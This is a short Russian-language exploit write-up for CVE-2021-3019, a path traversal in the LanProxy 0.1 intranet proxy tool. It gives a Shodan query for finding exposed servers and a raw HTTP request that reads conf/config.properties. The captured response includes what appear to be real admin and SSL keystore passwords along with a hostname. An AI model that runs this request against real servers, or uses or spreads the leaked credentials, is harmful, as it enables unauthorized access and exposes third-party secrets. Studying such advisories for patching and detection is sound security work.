
[CVE-2021-3019] LanProxy Directory Traversal
[CVE-2021-3019] Обход каталогов LanProxy
Lanproxy — это инструмент для проникновения в интранет, который проксирует персональные компьютеры и серверы локальной сети в публичную сеть.
Он поддерживает пересылку TCP-трафика и любой протокол верхнего уровня TCP (доступ к веб-сайтам интранета, отладка локальных платежных интерфейсов, SSH-доступ, удаленный рабочий стол и т.д.)
LanProxy версии 0.1 уязвим к обходу пути, что может позволить прочитать conf/config.properties для получения учетных данных для подключения к интранету.
Поиск Shodan: "Server: LPS-0.1"
Чтение конфигурационного файла
GET /../conf/config.properties HTTP/1.1
Host: vulnerablehost:8090
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:84.0) Gecko/20100101 Firefox/84.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
HTTP/1.1 200 OK
Content-Type: application/octet-stream
Server: LPS-0.1
server.bind=0.0.0.0
#与代理客户端通信端口
#这个端口是指客户端连接时对应的端口
server.port=4900
#ssl相关配置
server.ssl.enable=true
server.ssl.bind=0.0.0.0
server.ssl.port=4993
server.ssl.jksPath=usa.nat.candycloud.xyz
server.ssl.keyStorePassword=j5740NtBDCdH1ay
server.ssl.keyManagerPassword=j5740NtBDCdH1ay
#这个配置可以忽略
server.ssl.needsClientAuth=false
#WEB在线配置管理相关信息
#服务端ip地址一般不用修改默认就好
config.server.bind=0.0.0.0
#后台控制面板端口(安全组放行端口)
config.server.port=8090
#后台控制面板账号密码
config.admin.username=admin
config.admin.password=Twx7x03hCBbmwtr
